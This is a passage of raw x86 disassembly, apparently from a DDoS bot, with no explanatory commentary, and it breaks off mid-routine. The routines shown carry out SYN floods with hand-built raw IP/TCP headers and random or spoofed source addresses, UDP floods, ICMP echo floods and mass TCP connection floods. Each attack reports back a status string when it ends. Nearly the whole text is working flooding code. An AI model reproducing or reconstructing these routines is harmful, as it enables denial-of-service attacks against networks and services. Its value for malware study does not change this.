push offset unk_44CB94
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413835
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409C75
add esp, 14h
loc_413835: ; CODE XREF: sub_413740+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_415A3C
push [ebp+var_38]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413852: ; CODE XREF: sub_413740+B3�j
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4138B9
lea eax, [ebp+var_3BC]
push offset unk_44CBC4
push eax
call sub_41EA60
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_41389C
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409C75
add esp, 14h
loc_41389C: ; CODE XREF: sub_413740+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_415A3C
push [ebp+var_38]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4138B9: ; CODE XREF: sub_413740+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call ds:dword_4E2FC8 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4E3008 ; inet_addr
mov esi, ds:dword_4F537C
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
jmp loc_413A1A
; ---------------------------------------------------------------------------
loc_4138FC: ; CODE XREF: sub_413740+2EB�j
push 41Ch
mov ds:byte_4E5D30, 45h
call ds:dword_4E2FC8 ; htons
cmp [ebp+var_2C], edi
mov ds:word_4E5D32, ax
mov ds:word_4E5D34, bx
mov ds:word_4E5D36, di
mov ds:byte_4E5D38, 80h
mov ds:byte_4E5D39, bl
mov ds:word_4E5D3A, di
jz short loc_41396B
call sub_41EB70
mov ebx, eax
shl ebx, 8
call sub_41EB70
add ebx, eax
shl ebx, 8
call sub_41EB70
add ebx, eax
shl ebx, 8
call sub_41EB70
add ebx, eax
mov ds:dword_4E5D3C, ebx
xor ebx, ebx
inc ebx
jmp short loc_413983
; ---------------------------------------------------------------------------
loc_41396B: ; CODE XREF: sub_413740+1F9�j
push [ebp+var_1BC]
call sub_40AEAD
pop ecx
push eax
call ds:dword_4E3008 ; inet_addr
mov ds:dword_4E5D3C, eax
loc_413983: ; CODE XREF: sub_413740+229�j
mov eax, [ebp+var_18]
mov ds:dword_4E5D40, eax
call sub_41EB70
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4E5D44, dl
call sub_41EB70
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4E5D45, dl
call sub_41EB70
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov ds:word_4E5D46, di
mov ds:word_4E5D4A, bx
inc edx
mov ds:word_4E5D48, dx
call sub_41EB70
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_4E5D4C
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_4E5D30
push [ebp+var_4]
call ds:dword_4E302C ; sendto
cmp eax, 0FFFFFFFFh
jz loc_413AB6
inc [ebp+arg_0]
loc_413A1A: ; CODE XREF: sub_413740+1B7�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe loc_4138FC
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_44CBE8
push eax
call sub_41EA60
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413A99
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409C75
add esp, 14h
loc_413A99: ; CODE XREF: sub_413740+337�j
lea eax, [ebp+var_3BC]
push eax
call sub_415A3C
push [ebp+var_38]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413AB6: ; CODE XREF: sub_413740+2D1�j
push [ebp+var_4]
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_44CC38
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41EC30
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_413B0E
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409C75
add esp, 14h
loc_413B0E: ; CODE XREF: sub_413740+3AC�j
lea eax, [ebp+var_3BC]
push eax
call sub_415A3C
push [ebp+var_38]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_413740 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413B2B proc near ; DATA XREF: sub_401C87+55AD�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
xor edi, edi
inc edi
mov [eax+120h], edi
call ds:dword_4E2F50 ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call ds:dword_4E3008 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413B86
lea eax, [ebp+var_C0]
push eax
call ds:dword_4E304C ; gethostbyname
cmp eax, ebx
jz short loc_413B8C
loc_413B86: ; CODE XREF: sub_413B2B+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413BE9
loc_413B8C: ; CODE XREF: sub_413B2B+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_44CC80
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413BCC
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409C75
add esp, 14h
loc_413BCC: ; CODE XREF: sub_413B2B+7F�j
lea eax, [ebp+var_344]
push eax
call sub_415A3C
push [ebp+var_30]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_413BE9: ; CODE XREF: sub_413B2B+5F�j
cmp eax, ebx
jz short loc_413BF9
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413BFC
; ---------------------------------------------------------------------------
loc_413BF9: ; CODE XREF: sub_413B2B+C0�j
mov [ebp+var_4], esi
loc_413BFC: ; CODE XREF: sub_413B2B+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_41E4B0
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413C1C
mov [ebp+var_3C], eax
loc_413C1C: ; CODE XREF: sub_413B2B+EC�j
cmp [ebp+var_38], edi
jge short loc_413C24
mov [ebp+var_38], edi
loc_413C24: ; CODE XREF: sub_413B2B+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_413C51
loc_413C2B: ; CODE XREF: sub_413B2B+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call ds:dword_4E2EE0 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413C2B
loc_413C51: ; CODE XREF: sub_413B2B+FE�j
push [ebp+arg_0]
call ds:dword_4E307C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_44CCA8
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413C9A
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409C75
add esp, 14h
loc_413C9A: ; CODE XREF: sub_413B2B+14D�j
lea eax, [ebp+var_344]
push eax
call sub_415A3C
push [ebp+var_30]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
sub_413B2B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB7 proc near ; DATA XREF: sub_401C87+5803�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
xor esi, esi
inc esi
mov [eax+120h], esi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
push 11h
push 2
push 2
call ds:dword_4E3048 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call ds:dword_4E3008 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_413D9C
lea eax, [ebp+var_B0]
push eax
call ds:dword_4E304C ; gethostbyname
cmp eax, edi
jnz short loc_413D95
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_44CCD4
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_413D78
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409C75
add esp, 14h
loc_413D78: ; CODE XREF: sub_413CB7+9F�j
lea eax, [ebp+var_334]
push eax
call sub_415A3C
push [ebp+var_20]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_413D95: ; CODE XREF: sub_413CB7+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_413D9F
; ---------------------------------------------------------------------------
loc_413D9C: ; CODE XREF: sub_413CB7+6E�j
lea eax, [ebp+arg_0]
loc_413D9F: ; CODE XREF: sub_413CB7+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_413DBA
call sub_41EB70
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_413DBD
; ---------------------------------------------------------------------------
loc_413DBA: ; CODE XREF: sub_413CB7+F0�j
push [ebp+var_24]
loc_413DBD: ; CODE XREF: sub_413CB7+101�j
call ds:dword_4E2FC8 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_413DCF
mov [ebp+var_24], esi
loc_413DCF: ; CODE XREF: sub_413CB7+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_413DDC
mov [ebp+var_24], eax
loc_413DDC: ; CODE XREF: sub_413CB7+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_413DF0
mov [ebp+var_28], esi
loc_413DF0: ; CODE XREF: sub_413CB7+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_413E69
loc_413DF7: ; CODE XREF: sub_413CB7+158�j
call sub_41EB70
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_413DF7
jmp short loc_413E69
; ---------------------------------------------------------------------------
loc_413E13: ; CODE XREF: sub_413CB7+1B5�j
dec [ebp+var_30]
push 0Bh
pop esi
loc_413E19: ; CODE XREF: sub_413CB7+192�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call ds:dword_4E302C ; sendto
push [ebp+var_28]
call ds:dword_4F534C ; Sleep
dec esi
jnz short loc_413E19
cmp [ebp+var_24], edi
jnz short loc_413E69
call sub_41EB70
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_4E2FC8 ; htons
mov [ebp+var_E], ax
loc_413E69: ; CODE XREF: sub_413CB7+13E�j
; sub_413CB7+15A�j ...
cmp [ebp+var_30], edi
jg short loc_413E13
dec [ebp+var_30]
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_44CCFC
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_413EB1
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409C75
add esp, 14h
loc_413EB1: ; CODE XREF: sub_413CB7+1D8�j
lea eax, [ebp+var_334]
push eax
call sub_415A3C
push [ebp+var_20]
call sub_40B9A7
pop ecx
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
sub_413CB7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413ECE proc near ; DATA XREF: sub_401C87+4E73�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_414024
push eax
lea eax, [ebp+var_414]
push offset dword_44CD28
push eax
call sub_41EA60
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_413F4B
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409C75
add esp, 14h
loc_413F4B: ; CODE XREF: sub_413ECE+5B�j
lea eax, [ebp+var_414]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_413ECE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F6A proc near ; CODE XREF: sub_414024+27�p
var_654 = dword ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call ds:dword_4E2FC8 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_414020
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_413FB4: ; CODE XREF: sub_413F6A+B2�j
xor esi, esi
loc_413FB6: ; CODE XREF: sub_413F6A+77�j
push 0
push 1
push 2
call ds:dword_4F553C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+esi*4+var_654], eax
jz short loc_413FDE
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_4F5514 ; ioctlsocket
loc_413FDE: ; CODE XREF: sub_413F6A+62�j
inc esi
cmp esi, edi
jl short loc_413FB6
xor esi, esi
loc_413FE5: ; CODE XREF: sub_413F6A+91�j
lea eax, [ebp+var_14]
push 10h
push eax
push [ebp+esi*4+var_654]
call ds:dword_4F5530 ; connect
inc esi
cmp esi, edi
jl short loc_413FE5
push 64h
call ds:dword_4F534C ; Sleep
xor esi, esi
loc_414007: ; CODE XREF: sub_413F6A+AD�j
push [ebp+esi*4+var_654]
call ds:dword_4F5538 ; closesocket
inc esi
cmp esi, edi
jl short loc_414007
dec [ebp+arg_4]
jnz short loc_413FB4
pop edi
pop esi
loc_414020: ; CODE XREF: sub_413F6A+3E�j
xor eax, eax
leave
retn
sub_413F6A endp
; =============== S U B R O U T I N E =======================================
sub_414024 proc near ; CODE XREF: sub_413ECE+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AD91
push [esp+10h+arg_4]
mov edi, eax
call sub_41E710
push [esp+14h+arg_8]
mov ebx, eax
call sub_41E710
mov esi, eax
push esi
push ebx
push edi
call sub_413F6A
add esp, 18h
test eax, eax
jnz short loc_414058
inc eax
loc_414058: ; CODE XREF: sub_414024+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_414024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414067 proc near ; DATA XREF: sub_401C87+64F5�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_4143B4
push eax
lea eax, [ebp+var_414]
push offset unk_44CD54
push eax
call sub_41EA60
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4140E4
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409C75
add esp, 14h
loc_4140E4: ; CODE XREF: sub_414067+5B�j
lea eax, [ebp+var_414]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_414067 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414103 proc near ; CODE XREF: sub_4143B4+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4E2F38 ; WSAStartup
test eax, eax
jz short loc_414143
xor eax, eax
jmp loc_414387
; ---------------------------------------------------------------------------
loc_414143: ; CODE XREF: sub_414103+37�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_4E306C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_41437F
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_414375
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call ds:dword_4E2FC8 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call ds:dword_4E2FC8 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call ds:dword_4E2FC8 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call ds:dword_4E2FC8 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_4F540C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_421180
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_41422E: ; CODE XREF: sub_414103+25D�j
; sub_414103+269�j
mov [ebp+var_24], bx
call sub_41EB70
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_4E2FC8 ; htons
mov [ebp+var_34], ax
call sub_41EB70
mov edi, eax
shl edi, 10h
call sub_41EB70
or edi, eax
push edi
call ds:dword_4E2FC8 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_4E2FC4 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_4E2FC8 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41FBF0
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AF06
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41FBF0
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41E4B0
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AF06
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41FBF0
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call ds:dword_4E302C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_41438B
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_4F5408 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_414372
jl loc_41422E
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jb loc_41422E
loc_414372: ; CODE XREF: sub_414103+25B�j
mov ebx, [ebp+arg_8]
loc_414375: ; CODE XREF: sub_414103+78�j
; sub_414103+2AF�j
push [ebp+var_C]
call ds:dword_4E3060 ; closesocket
pop esi
loc_41437F: ; CODE XREF: sub_414103+5B�j
call ds:dword_4E2F20 ; WSACleanup
mov eax, ebx
loc_414387: ; CODE XREF: sub_414103+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41438B: ; CODE XREF: sub_414103+247�j
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_44CD7C
push eax
call sub_41EA60
lea eax, [ebp+var_F4]
push eax
call sub_415A3C
add esp, 10h
jmp short loc_414375
sub_414103 endp
; =============== S U B R O U T I N E =======================================
sub_4143B4 proc near ; CODE XREF: sub_414067+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AD91
push [esp+10h+arg_4]
mov esi, eax
call sub_41E710
push [esp+14h+arg_8]
mov ebx, eax
call sub_41E710
mov edi, eax
call sub_41EB70
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_414103
add esp, 1Ch
test eax, eax
jnz short loc_4143FD
inc eax
loc_4143FD: ; CODE XREF: sub_4143B4+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4143B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41440C proc near ; DATA XREF: sub_401C87+6E5D�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41E710
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call ds:dword_4E3008 ; inet_addr
push eax
call sub_4144AD
push eax
lea eax, [ebp+var_394]
push offset dword_44CD9C
push eax
call sub_41EA60
xor esi, esi
add esp, 14h
cmp [ebp+var_8], esi
jnz short loc_41448E
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409C75
add esp, 14h
loc_41448E: ; CODE XREF: sub_41440C+60�j
lea eax, [ebp+var_394]
push eax
call sub_415A3C
push [ebp+var_10]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_41440C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4144AD proc near ; CODE XREF: sub_41440C+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
